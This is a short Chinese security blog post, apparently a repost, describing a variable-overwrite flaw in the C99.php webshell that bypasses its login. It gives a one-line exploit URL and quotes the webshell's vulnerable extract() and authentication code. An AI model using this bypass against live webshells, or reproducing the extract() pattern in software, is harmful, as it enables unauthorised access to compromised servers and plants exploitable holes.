Sky's自留地

关注互联网安全,关注安全&攻击技术。

C99.PHP webshell 绕过登陆密码漏洞

技术类 阅读: 7320 0 评

from:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ 

C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。 

http://127.0.0.1/c99.php?c99shcook[login]=0

 


可直接登陆。 

@extract($_REQUEST["c99shcook"]);

 


变量覆盖 

if ($login) { 
    if (empty($md5_pass)) { 
        $md5_pass = md5($pass); 
    } 
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { 
        if ($login_txt === false) { 
            $login_txt = ""; 
        } elseif (empty($login_txt)) { 
            $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); 
        } 
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); 
        header("HTTP/1.0 401 Unauthorized"); 
        exit($accessdeniedmess); 
    } 
}

 

一个奇怪的ASP一句话
发表评论
撰写评论